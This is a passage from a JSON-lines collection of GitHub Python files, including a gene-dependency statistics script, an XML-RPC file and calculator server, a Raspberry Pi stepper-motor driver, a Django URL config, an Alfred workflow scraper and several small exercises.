mesh_params)","repo_name":"jkhansell/CFDFinalProject","sub_path":"StructuredGrids/meshstudy/scripts/structuredmesh.py","file_name":"structuredmesh.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73901460919","text":"import sys\ninput = lambda: sys.stdin.readline()\n\ndef solution(N):\n result = []\n for a in range(N//5+1): \n if 5*a+3*((N - a*5)//3) == N:\n result.append(a+(N - a*5)//3)\n if len(result) == 0:\n return -1\n return min(result)\n \n \n \n\nN = int(input())\nS = solution(N)\nprint(S)\n","repo_name":"Hoya324/Python-Study","sub_path":"기본 수학1/BOJ 2829[설탕 배달] .py","file_name":"BOJ 2829[설탕 배달] .py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23942862406","text":"#This script does the following:\r\n# (1) Find the cell lines with high expression level of gene of interest (GOI). \r\n# Here \"high expression level\" is defined as the top 1/3-quantile with regards to RPKM value)\r\n# (2) For each gene in DepMap gene dependency data, perform wilcoxon ranksum test \r\n# to see if cell lines with high GOI expression level has higher or worse dependency level than the remaining cell lines.\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport scipy as sp\r\nimport argparse\r\nimport sys\r\nfrom scipy.stats import mannwhitneyu\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-g','--gene',type = str,required = True)\r\nparser.add_argument('-rs','--rpkm_subset',type = str,required = True)\r\nparser.add_argument('-gds','--gene_dependency_subset',type = str,required = True)\r\nparser.add_argument('-o','--output',type = str, required=True)\r\nargs = parser.parse_args(sys.argv[1:])\r\n\r\n#load datasets\r\ndf_rpkm = pd.read_csv(args.rpkm_subset,sep = '\\t',header=0, index_col=0 )\r\ndf_gd = pd.read_csv(args.gene_dependency_subset,sep = '\\t', header = 0, index_col =0)\r\n\r\n# (1) Find the cell lines with high expression level of gene of interest (GOI). \r\n# find cells with high GOI expresison level (defined as top 1/3 quartile) and the remaining cells (the remaining 2/3-quantile)\r\ncutoff = round((1/3)*len(df_rpkm))\r\ndf_high_GOI_expression = pd.DataFrame(df_rpkm.iloc[0:cutoff])\r\nhigh_GOI_cells = list(df_high_GOI_expression.index)\r\nnon_high_GOI_cells = set(df_rpkm.index)-set(high_GOI_cells)\r\n\r\nprint('Among {} cell lines, {} have high {} expression level'.format(len(df_rpkm),len(high_GOI_cells),args.gene))\r\n\r\n# (2) For each gene in DepMap gene dependency data, perform wilcoxon ranksum test \r\n# to see if cell lines with high GOI expression level has higher or worse dependency level than the remaining cell lines.\r\n# create empty dict for information needed\r\nstats = dict()\r\npvals = dict()\r\nhigh_means = dict()\r\nhigh_stds = dict()\r\nremain_means = dict()\r\nremain_stds = dict()\r\n\r\n# iterate over each of the 17634 genes in the DepMap dataset and perform wilcoxon ranksum test between gene dependency score \r\n# of cell lines with high expression level of GOI and the remaining cell lines. The results are saved as dict entries.\r\nfor gene in list(df_gd.columns):\r\n df_g = pd.DataFrame(df_gd[gene])\r\n high_GOI_gen_dep = pd.DataFrame(df_g.loc[high_GOI_cells])\r\n non_high_GOI_gen_dep = pd.DataFrame(df_g.loc[non_high_GOI_cells])\r\n high_means[gene] = np.mean(high_GOI_gen_dep[gene])\r\n high_stds[gene] = np.std(high_GOI_gen_dep[gene])\r\n remain_means[gene] = np.mean(non_high_GOI_gen_dep[gene])\r\n remain_stds[gene]= np.std(non_high_GOI_gen_dep[gene])\r\n if high_means[gene]> remain_means[gene]:\r\n mwu_alt = 'greater'\r\n else:\r\n mwu_alt = 'less'\r\n mwu = mannwhitneyu(high_GOI_gen_dep[gene],non_high_GOI_gen_dep[gene], use_continuity = False, alternative =mwu_alt)\r\n stats[gene] = mwu[0]\r\n pvals[gene] = mwu[1]\r\n \r\n# combine the results into a data frame\r\nresults = [stats,pvals,high_means,high_stds,remain_means,remain_stds]\r\ndf_results = pd.DataFrame(results).T\r\ndf_results.columns = ['mwu_stat','mwu_pval','high_mean','high_std','remain_mean','remain_std']\r\n\r\n# select significant data based on pval and saved it to another df\r\ndf_results_sig = pd.DataFrame(df_results[df_results['mwu_pval']<=0.05])\r\n\r\n# add a column to show whether the difference in gene dependency scores indicates proliferative advantange or disadvantage\r\n# higher scores = proliferative advantage, lower scores = disadvantage\r\ndf_results_sig['adv_or_disadv'] = df_results_sig['high_mean']>df_results_sig['remain_mean']\r\ndf_results_sig =df_results_sig.replace({True:'adv',False:'disadv'})\r\n\r\n# add a column to show the absolute difference between gene dependency scores of cells with high GOI expression level and the remaining cells\r\ndf_results_sig['diff'] = abs(df_results_sig['high_mean']-df_results_sig['remain_mean'])\r\n\r\n#sort results by absolute difference\r\ndf_results_sig = df_results_sig.sort_values(by = ['diff'],ascending= False)\r\n\r\n#save results to tsv\r\ndf_results_sig.to_csv(args.output,sep= '\\t')","repo_name":"lrgr/CENPA-SDL","sub_path":"src/pan_cancer_unbiased_gene_dependency_analysis.py","file_name":"pan_cancer_unbiased_gene_dependency_analysis.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33877134712","text":"from data import data\n\nimport models as m\n\n\ndef load_data(db):\n try:\n # Загружаем дни недели в базу\n for wd, name in data.weekdays.items():\n db.session.add(m.Weekday(short_name=wd, ru_name=name))\n\n # Загружаем цели\n for g in data.goals:\n db.session.add(m.Goal(**g))\n\n # Загружаем преподавателей\n if m.Teacher.query.count() == 0:\n goals = m.Goal.query.all()\n for teacher in data.teachers:\n t = m.Teacher(\n id=teacher['id'],\n name=teacher['name'],\n about=teacher['about'],\n rating=teacher['rating'],\n picture=teacher['picture'],\n price=teacher['price'],\n free=teacher['free']\n )\n # Дополняем связи с целями\n for g in goals:\n if g.name in teacher['goals']:\n t.goals.append(g)\n\n db.session.add(t)\n db.session.commit()\n print('initial data loaded')\n except:\n db.session.rollback()\n print('data already exists')\n","repo_name":"IvanRychkov/stepik_teachers","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22645865456","text":"import json\nimport os\nfrom loguru import logger\nfrom performance import Performance\n\n\ndef load_config(file: str) -> list[dict]:\n with open(file, \"r\") as f:\n data: dict = json.load(f)\n logger.success(f\"Load config: {data['name']} - v{data['version']}\")\n return data.get(\"data\")\n\n\nif __name__ == \"__main__\":\n # main_path = sys.executable # for pyinstaller\n # main_path = \".\" # for pyinstaller\n main_path = __file__\n config_file = os.path.join(os.path.dirname(main_path), \"perf.json\")\n config = load_config(config_file)\n for cfg in config:\n file: str = os.path.join(os.path.dirname(main_path), cfg.get(\"source\"))\n per_type: str = cfg.get(\"type\")\n processes: list[str] = cfg.get(\"processes\")\n title: str = cfg.get(\"title\")\n mp = Performance(per_type)\n if cfg.get(\"enabled\"):\n chunks = mp.content_splits(file, mp.seperator_pattern)\n for process in processes:\n y_data = mp.data_extraction(chunks, mp.match_pattern(process))\n mp.save_plot(\n y_data,\n y_label=per_type,\n title=f\"{title}_{process.replace('/', '_')}\",\n )\n else:\n logger.warning(f\"{per_type} is disabled!\")\n","repo_name":"maple24/vta","sub_path":"vta/tasks/performance/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32284243055","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\ndef bfs(idx):\n visited=[-1]*(n+1)\n visited[idx]=0\n q=deque([idx])\n while q:\n now = q.popleft()\n for _next in graph[now]:\n if visited[_next]==-1:\n visited[_next]=visited[now]+1\n q.append(_next)\n node=0\n cnt=0\n for i in range(1,n+1):\n if cnt< visited[i]:\n cnt = visited[i]\n node=i\n return node,cnt\n\nn= int(input())\ngraph= [[] for _ in range(n+1)]\n\nfor _ in range(n-1):\n u,v = map(int,input().split())\n graph[u].append(v)\n graph[v].append(u)\n\nfirst,firstdist= bfs(1)\nprint(first,firstdist)\nsecond,diameter=bfs(first)\nprint(second,diameter)\nprint((diameter+1)//2)","repo_name":"kimth007kim/python_algorithm","sub_path":"코테스터디/2022/0402/12896 스크루지 민호 bfs 해설.py","file_name":"12896 스크루지 민호 bfs 해설.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70726642681","text":"# Definition for a Node.\nclass Node:\n def __init__(self, x, next=None, random=None):\n self.val = int(x)\n self.next = next\n self.random = random\n\nclass Solution(object):\n def __init__(self):\n self.visited = {}\n\n def copyRandomList(self, head):\n \"\"\"\n :type head: Node\n :rtype: Node\n https://leetcode.com/problems/copy-list-with-random-pointer/solutions/3205736/138-solution-with-step-by-step-explanation/\n \"\"\"\n if not head:\n return None\n if head in self.visited:\n return self.visited[head]\n # Create a new node with the same value as the original node\n node = Node(head.val,None,None)\n self.visited[head]=node \n\n node.next = self.copyRandomList(head.next)\n node.random = self.copyRandomList(head.random)\n return node \n \n\n\n\n\n\n\nhead = [[7,None],[13,0],[11,4],[10,2],[1,0]]\nobj = Solution().copyRandomList(head)\n\n","repo_name":"danyow-cheung/Algorithms_python","sub_path":"leetcode/linkedlist_138.py","file_name":"linkedlist_138.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20969236870","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport pandas as pd\nfrom scipy import integrate\n\n################# FUNCTIONS ##################\ndef reader(name, beta_min, beta_max, delta_ang, delta_t):\n init_num = 17\n count_num = int((beta_max-beta_min)/delta_ang) + 17\n\n with open(name, \"r\", encoding='utf-8', errors='ignore') as file:\n counts = file.readlines()\n \n counts = counts[init_num:count_num]\n counts[0] = counts[0].split()[1]\n \n points = []\n #ct, ang = [], []\n for ii in range(len(counts)):\n angl = beta_min + ii*delta_ang\n pp = [float(\"{0:.1f}\".format(angl)), float(counts[ii])]\n #ct.append(float(counts[ii]))\n #ang.append(float(\"{0:.1f}\".format(angl)))\n points.append(pp)\n return np.array(points)\n\ndef plotter(array, Title = \"Gráfico\", clr = 'dodgerblue'):\n plt.plot(array[:,0], array[:,1], color = clr)\n plt.grid()\n plt.title(Title)\n plt.show()\n\ndef plotter_2(array1, array2, Title = \"Gráfico\"):\n plt.plot(array1[:,0], array1[:,1], label=\"Medição 1\")\n plt.plot(array2[:,0], array2[:,1], label=\"Medição 2\")\n plt.grid()\n plt.legend()\n plt.title(Title)\n plt.show()\n\ndef gaussian(x, amplitude, mean, stddev, cte = 0):\n return amplitude * np.exp(-((x - mean) ** 2) / (2 * stddev ** 2)) + cte\n\ndef double_gaussian(x, amplitude1, mean1, stddev1, amplitude2, mean2, stddev2, cte = 0):\n return gaussian(x, amplitude1, mean1, stddev1) + gaussian(x, amplitude2, mean2, stddev2) + cte\n\ndef d_calculator(n, lambda_, teta):\n return n*lambda_/(2*np.sin(np.deg2rad(teta)))\n\ndef Potencia_Resolutiva(teta, delta_teta):\n return np.tan(np.deg2rad(teta))/delta_teta\n\n######################################################################################\n##################################### MAIN ###########################################\n######################################################################################\n### Constants\nlambda_K_alpha = 71.080 # pm\nlambda_K_beta = 63.095 # pm\n\n### Reading data\n\"\"\"\nler os ficheiros dos cristais com I = 0.1mA + NaCl com I = 0.1mA + do fundo\n\"\"\"\n\n\"\"\"\nler files para ref relativa \n\"\"\"\nNaCl_spectrum = reader(\"dados_ref/NaCl_spectrum.xry\", 2.5, 60, 0.2, 1)\nSi_spectrum = reader(\"dados_ref/Si_spectrum.xry\", 2.5, 60, 0.2, 1)\nLiF_spectrum = reader(\"dados_ref/LiF_spectrum.xry\", 5, 40, 0.1, 1)\nNaCl_X_spectrum = reader(\"dados_ref/NaCl_spectrum_x.xry\", 2.5, 45, 0.1, 1)\nNaCl_O_spectrum = reader(\"dados_ref/NaCl_spectrum_O.xry\", 2.5, 45, 0.1, 4)\nAl_spectrum_mau = reader(\"dados_ref/Al_Spectrum_mau.xry\", 2.5, 45, 0.1, 1)\nHOPG_spectrum = reader(\"dados_ref/HOPG_Spectrum.xry\", 2.5, 45, 0.1, 1)\nSafira_spectrum = reader(\"dados_ref/Safira_spectrum.xry\", 10, 45, 0.1, 1)\nspectrums = [NaCl_spectrum, Si_spectrum, LiF_spectrum, NaCl_X_spectrum, NaCl_O_spectrum, Al_spectrum_mau, HOPG_spectrum, Safira_spectrum]\n\n#Selecionar valores so a partir de 10.1 (podemos mudar este valor)\nnew_specs = []\nfor spec in spectrums:\n for i in range(len(spec)):\n if spec[i][0] == 10.1:\n break\n new_spec = spec[i+1:]\n new_specs.append(new_spec)\n\nnew_new_specs = []\n\n#Selecionar valores so até 39.9\nfor s in new_specs:\n for i in range(len(spec)):\n if s[i][0] == 39.9:\n break\n new_new_spec = s[:i+2]\n new_new_specs.append(new_new_spec)\n\n#transformar esta merda em numpy arrays como deve ser \nx_piqi= np.array(new_new_specs[0])[:,0]\nx_grande = np.array(new_new_specs[7])[:,0]\ny_specs = []\nfor i in range(len(new_new_specs)): y_specs.append(np.array(new_new_specs[i])[:,1])\n\nresults = []\nfor spec in y_specs:\n if len(spec) == len(x_piqi):\n results.append(integrate.simps(spec, x_piqi))\n elif len(spec) == len(x_grande):\n results.append(integrate.simps(spec, x_grande))\n else:\n raise ValueError('O comprimento do array não é igual ao do x')\n\nrefletividades_relativas = []\n\nfor res in results: refletividades_relativas.append(res/results[0])\n\nprint('Refletividade Relativa Si: ', refletividades_relativas[1])\nprint('Refletividade Relativa LiF: ', refletividades_relativas[2])\nprint('Refletividade Relativa NaCl_X: ', refletividades_relativas[3])\nprint('Refletividade Relativa NaCl_O: ', refletividades_relativas[4])\nprint('Refletividade Relativa Al: ', refletividades_relativas[5])\nprint('Refletividade Relativa HOPG: ', refletividades_relativas[6])\nprint('Refletividade Relativa Safira: ', refletividades_relativas[7])\n\n\n\n### Plotting data\n\"\"\"se quiseres\"\"\"\n\n##### Calculate the absolute reflectivity of NaCl\n\"\"\"\nDividir as counts de NaCl pelas do fundo\n\"\"\"\nnacl_001 = reader(\"dados_ref/NaCl_0.01mA.xry\", 5, 9, 0.1, 5)\nnada_001 = reader(\"dados_ref/Nada_0.01mA.xry\", -2.5, 2.5, 0.1, 5)\n\nnacl_002 = reader(\"dados_ref/NaCl_0.02mA.xry\", 5, 9, 0.1, 5)\nnada_002 = reader(\"dados_ref/Nada_0.02mA.xry\", -2.5, 2.5, 0.1, 5)\n\ncounts_nacl_001 = 0\ncounts_nacl_002 = 0\ncounts_nada_001 = 0\ncounts_nada_002 = 0\n\nfor i in range(1, len(nacl_001)):\n counts_nacl_001 += nacl_001[i][1]\n counts_nada_001 += nada_001[i][1]\n counts_nacl_002 += nacl_002[i][1]\n counts_nada_002 += nada_002[i][1]\n\nreflec_abs_nacl_001 = counts_nacl_001/counts_nada_001\nreflec_abs_nacl_002 = counts_nacl_002/counts_nada_002\n\nprint(reflec_abs_nacl_001)\nprint(reflec_abs_nacl_002)\n\n\n\n\n\n##### Calculate the relative reflectivity of crystals\n\"\"\"Dividir as counts dos cristais pelas do NaCl 1.0mA\"\"\" \n\n##### Calculate the absolute reflectivity of crystals\n\"\"\"Multiplicar as reflectividades relativas dos cristais pela reflectividade absoluta do NaCl\"\"\"\n\n\n","repo_name":"NunoGandum19/LFEA-II","sub_path":"Analise/Espetroscopia_rx/refletividade.py","file_name":"refletividade.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30613696652","text":"#Code to interface with DRV8821 and two stepper motors\n\nimport wiringpi\n\n\n#Pin number listing\n\nPWMA = 7 #Uses actual pin numbers, not GPIO number\nPWMB = 13\nABRST = 33\nABDIR = 35\nCDRST = 37\nCDDIR = 15\n\n# Static Variables\nOUTPUT = 1\nHIGH = 1\nLOW = 0\n\nwiringpi.wiringPiSetup()\nwiringpi.pinMode(PWMA,OUTPUT)\nwiringpi.pinMode(PWMB,OUTPUT)\nwiringpi.pinMode(ABRST,OUTPUT)\nwiringpi.pinMode(ABDIR,OUTPUT)\nwiringpi.pinMode(CDRST,OUTPUT)\nwiringpi.pinMode(CDDIR,OUTPUT)\n\n#for time in range(0,4):\n#\tfor brightness in range(0,100): # Going from 0 to 100 will give us full off to full on\n#\t\twiringpi.softPwmWrite(PIN_TO_PWM,brightness) # Change PWM duty cycle\n#\t\twiringpi.delay(10) # Delay for 0.2 seconds\n#\tfor brightness in reversed(range(0,100)):\n#\t\twiringpi.softPwmWrite(PIN_TO_PWM,brightness)\n#\t\twiringpi.delay(10)\n\n\npwmacount= int(raw_input(\"Enter number of PWM pulses for pin 7:\\n\"))\n\n#Inputs for later\nMotorABDir = 1\nMotorCDDir = 0\n\nwiringpi.digitalWrite(ABRST,HIGH) #Enable motor 1\nwiringpi.digitalWrite(CDRST,HIGH) #Enable motor 2\nwiringpi.digitalWrite(ABDIR,MotorABDir) #Enable motor 2\nwiringpi.digitalWrite(CDDIR,MotorCDDir) #Enable motor 2\n\n\n\nfor pulses in range(0,pwmacount):\n\n\twiringpi.digitalWrite(PWMA,HIGH)\n\twiringpi.delayMicroseconds(500) #f = 900Hz (pulses per second). T = 1/f. Delay = T/2 = 555.56us> Modified based on scope\n\twiringpi.digitalWrite(PWMA,LOW)\n\twiringpi.delayMicroseconds(500)\n\t\n\t#wiringpi.digitalWrite(PWMB,HIGH)\n\t#wiringpi.delayMicroseconds(500) #f = 900Hz (pulses per second). T = 1/f. Delay = T/2 = 555.56us> Modified based on scope\n\t#wiringpi.digitalWrite(PWMB,LOW)\n\t#wiringpi.delayMicroseconds(500)\n\nwiringpi.digitalWrite(ABRST,LOW) #Disable motor 1\nwiringpi.digitalWrite(CDRST,LOW) #Disable motor 2\n","repo_name":"nabeelfkhan/RpiProjects","sub_path":"examples/stepper.py","file_name":"stepper.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21746125097","text":"# Joe Degere\n# 11/11/19\n# Homework\n\n\nclass Vehicle:\n def __init__(self, name, brand, shift, year ):\n self.name = name\n self.brand = brand\n self.shift = shift\n self.year = year\n\n def description(self):\n print(f\"I'm gonna give you a tour of this vehicle: It is a {self.name} made in {self.year}.\")\n print(f\"This {self.name} is a {self.shift} just to be aware.\")\n print(f\"The car brand is {self.brand} and the year is {self.year}\")\n\n","repo_name":"degerej/car","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"702416413","text":"menu = {\n \"Baja Taco\": 4.00,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n}\nbill = 0\nwhile True:\n try:\n order = input(\"Item: \").title()\n if order in menu:\n bill += menu[order]\n print(\"Total: $%0.2f\" % bill)\n else:\n continue\n except EOFError:\n break\n","repo_name":"BurakAhmet/cs50p","sub_path":"Problem Set 3/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15245495154","text":"from django.urls import include, path\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n# 회원가입기능\nfrom users import views\n\n\n\nurlpatterns = [\n path('signup/', views.Signup.as_view(),name=\"signup\"),\n path('api/token/', views.CustomTokenObtainPairView.as_view(), name='token_obtain_pair'), # 토큰 방식의 로그인 urls \n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('follow/<int:user_id>/', views.Follow_View.as_view(), name=\"follow\"),\n path('<int:user_id>/', views.ProfileView.as_view(), name='profile_view'),\n # path('logout/', views.LogoutView.as_view(), name='logout'),\n \n]\n\n","repo_name":"bm4706/777_DRF_BACK","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27616907379","text":"from xmlrpc.server import SimpleXMLRPCServer\r\nimport sys\r\nimport os.path\r\n\r\n# Read command line arguments\r\nip = sys.argv[1]\r\nport = int(sys.argv[2])\r\n# Create server\r\nwith SimpleXMLRPCServer((ip, port), logRequests=False) as my_server:\r\n my_server.register_introspection_functions()\r\n\r\n # send\r\n def send_file(filename, data):\r\n if not os.path.exists('./s_files/' + filename):\r\n my_file = open('./s_files/' + filename, 'wb')\r\n my_file.write(data.data)\r\n my_file.close()\r\n print(f'{filename} saved')\r\n return True\r\n else:\r\n print(f'{filename} not saved')\r\n return False\r\n my_server.register_function(send_file, 'send')\r\n\r\n # list\r\n def list_files():\r\n return os.listdir('./s_files')\r\n my_server.register_function(list_files, 'list')\r\n\r\n # delete\r\n def delete_file(filename):\r\n if os.path.exists('./s_files/' + filename):\r\n os.remove('./s_files/' + filename)\r\n print(f'{filename} deleted')\r\n return True\r\n else:\r\n print(f'{filename} not deleted')\r\n return False\r\n my_server.register_function(delete_file, 'delete')\r\n\r\n # get\r\n def get_file(filename):\r\n if os.path.exists('./s_files/' + filename):\r\n my_file = open('./s_files/' + filename, 'rb')\r\n my_file_size = os.path.getsize('./s_files/' + filename)\r\n print(f'File send: {filename}')\r\n return my_file.read(my_file_size)\r\n else:\r\n print(f'No such file: {filename}')\r\n return False\r\n my_server.register_function(get_file, 'get')\r\n\r\n # calc\r\n def calculate(expression):\r\n try:\r\n operator, left, right = expression.split()\r\n if check(left) != 'Invalid input' and check(right) != 'Invalid input':\r\n # Left operand = int/float\r\n left = check(left)\r\n # Right operand = int/float\r\n right = check(right)\r\n\r\n if operator == '+':\r\n result = left + right\r\n elif operator == '-':\r\n result = left - right\r\n elif operator == '*':\r\n result = left * right\r\n elif operator == '/':\r\n try:\r\n result = left / right\r\n except ZeroDivisionError:\r\n result = 'Division by 0'\r\n elif operator == '>':\r\n result = left > right\r\n elif operator == '<':\r\n result = left < right\r\n elif operator == '>=':\r\n result = left >= right\r\n elif operator == '<=':\r\n result = left <= right\r\n else:\r\n result = False\r\n\r\n # If the result = n.0 then this code makes it = n\r\n if str(result).endswith('.0'):\r\n result = int(result)\r\n else:\r\n result = False\r\n except Exception:\r\n result = False\r\n\r\n if result == False or result == 'Division by 0':\r\n print(f'{expression} -- not done')\r\n else:\r\n print(f'{expression} -- done')\r\n\r\n return result\r\n my_server.register_function(calculate, 'calc')\r\n\r\n # Check whether the operand is valid:\r\n # if it consists only of digits then int, if digits and one '.' then float\r\n def check(num):\r\n if num.isdigit():\r\n return int(num)\r\n elif num.find('.') == num.rfind('.') != -1:\r\n left1, left2 = num.split('.')\r\n if (left1 + left2).isdigit():\r\n return float(num)\r\n else:\r\n return 'Invalid input'\r\n else:\r\n return'Invalid input'\r\n\r\n # main\r\n try:\r\n my_server.serve_forever()\r\n except KeyboardInterrupt:\r\n print('Server is stopping')","repo_name":"curlykorine/Distributed-and-Network-Programming","sub_path":"xmlrpcClientServer/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9908906380","text":"#Thea Sitek, STKTHE002\r\n#18.05.2014\r\n#Count votes\r\n\r\n\r\nprint('Independent Electoral Commission')\r\nprint('--------------------------------')\r\n\r\n#store inputed votes\r\narray = []\r\nvote = input('Enter the names of parties (terminated by DONE): \\n')\r\nwhile vote != 'DONE':\r\n array.append(vote)\r\n vote = input() \r\n\r\narray.sort()\r\nlength = len(array)\r\n\r\n#if any votes\r\nif array:\r\n \r\n votes = [array[0]] #start value is first vote, alfabetic\r\n amount = [1] #first vote\r\n count = 0\r\n \r\n for i in range(1 , len(array)):\r\n #if vote not equal to one already counted, store name\r\n if array[i] != array[i-1]:\r\n votes.append(array[i])\r\n amount.append(1)\r\n count += 1 \r\n #if not give existing name one extra vote\r\n elif array[i] == array[i-1]:\r\n amount[count] += 1 \r\n \r\n \r\nprint('\\nVote counts:')\r\n \r\nif array:\r\n #format and print\r\n space = 8\r\n for i in range(len(votes)):\r\n space -= len(votes[i]) - 1 \r\n print(votes[i], ' '*space, '-', amount[i])\r\n space = 8\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/stkthe002/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21272612472","text":"# Напишите функцию, которая возвращает список с уникальными (не повторяющихся) элементам.\n# Не используй set, или другие функции для получения уникальных фильмов\n\ndef unique_tsil(numbers):\n unique = []\n for number in numbers:\n if number in unique:\n continue\n else:\n unique.append(number)\n return unique\nnumbers = list(map(int, input(\"Введите элементы списка: \").split()))\n\n\ndef main():\n unique_tsil(numbers)\n print(unique_tsil(numbers))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ArtemChernyschev/CourseMC","sub_path":"Unique list.py","file_name":"Unique list.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74440722361","text":"import simplejson as json\nimport urlparse\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\n\nclass RedirectPage(webapp.RequestHandler):\n def handle(self):\n path = self.request.path\n if path.endswith(\"/\"):\n path += \"index.html\"\n self.redirect(urlparse.urljoin('https://d31nkok4v6vad6.cloudfront.net/static/', path.strip(\"/\")) +\n \"#\" + getattr(self, \"signed_request\", \"\"))\n\n def post(self):\n try:\n signed_request = self.request.get('signed_request')\n if signed_request:\n _, payload = signed_request.split('.', 1)\n self.signed_request = payload\n except:\n pass\n\n self.handle()\n\n def get(self):\n self.handle()\n\napplication = webapp.WSGIApplication(\n [('/.*', RedirectPage)],\n debug=False,\n)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tomwys/facebook-static-pages","sub_path":"redirect.py","file_name":"redirect.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"73498866039","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\nimport hashlib\n\nurl = \"https://alfred.app/workflows/\"\n\ndef get_workflows(url):\n workflows = []\n page = 0\n while True:\n print(f\"Fetching page {page+1}...\")\n try:\n response = requests.get(url)\n response.raise_for_status()\n except requests.exceptions.RequestException as e:\n print(f\"An error occurred while fetching the URL: {e}\")\n break\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n workflowlist_section = soup.find(\"nav\", {\"id\": \"workflowlist\"})\n\n if workflowlist_section is None:\n break\n\n for a_tag in workflowlist_section.find_all(\"a\", href=True):\n div = a_tag.find(\"div\")\n if div is None:\n continue\n\n icon = div.find_all(\"img\")\n h2 = div.find(\"h2\")\n p = div.find(\"p\")\n\n if len(icon) == 2:\n icon = icon[1]\n else:\n icon = icon[0]\n\n icon_hash = compute_image_hash('https://alfred.app' + icon[\"src\"])\n\n if icon is None or h2 is None or p is None:\n continue\n\n href_parts = a_tag[\"href\"].split(\"/\")\n if len(href_parts) < 3:\n continue\n\n workflows.append({\n \"url\": 'https://alfred.app' + a_tag[\"href\"],\n \"icon_url\": 'https://alfred.app' + icon[\"src\"],\n 'icon_hash': icon_hash,\n \"title\": h2.text,\n \"description\": p.text,\n \"author\": href_parts[2],\n 'installation_url': 'alfred://gallery' + a_tag[\"href\"].replace(\"/workflows/\", \"/workflow/\")\n })\n\n pagination_section = soup.find(\"nav\", {\"class\": \"pagination\"})\n if pagination_section is None:\n break\n\n next_page = pagination_section.find(\"li\", {\"class\": \"pagenext\"})\n if next_page is None:\n break\n\n link = next_page.find('a')\n if link:\n url = \"https://alfred.app\" + link[\"href\"]\n else:\n break\n page += 1\n\n return workflows\n\n\ndef compute_image_hash(image_url):\n try:\n response = requests.get(image_url)\n response.raise_for_status()\n except requests.exceptions.RequestException as e:\n print(f\"An error occurred while fetching the image URL: {e}\")\n return None\n\n image_data = response.content\n sha256 = hashlib.sha256()\n sha256.update(image_data)\n\n return sha256.hexdigest()\n\ntry:\n workflows = get_workflows(url)\n with open('workflows.json', 'w') as f:\n json.dump(workflows, f, indent=4)\nexcept Exception as e:\n print(f\"An unexpected error occurred: {e}\")\n\n","repo_name":"TerminalFi/alfred-gallery-channel","sub_path":"scripts/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10030136607","text":"\n# Import required libraries\nimport os\n\n# Get desired inputs from user\nfolder_path = input(\"Enter the folder path: \")\nname_prefix = input(\"Enter the name prefix: \")\n\nall_files = os.listdir(folder_path)\nprint(\"Old Filenames:\", all_files)\n\nignore_files = [\".git\"]\n\ncount = 1\nfor file in all_files:\n if file not in ignore_files:\n file_extension = os.path.splitext(file)[1]\n new_name = name_prefix + str(count) + file_extension\n os.rename(folder_path + \"/\" + file, folder_path + \"/\" + new_name)\n count += 1\n\nall_files = os.listdir(folder_path)\nprint(\"New 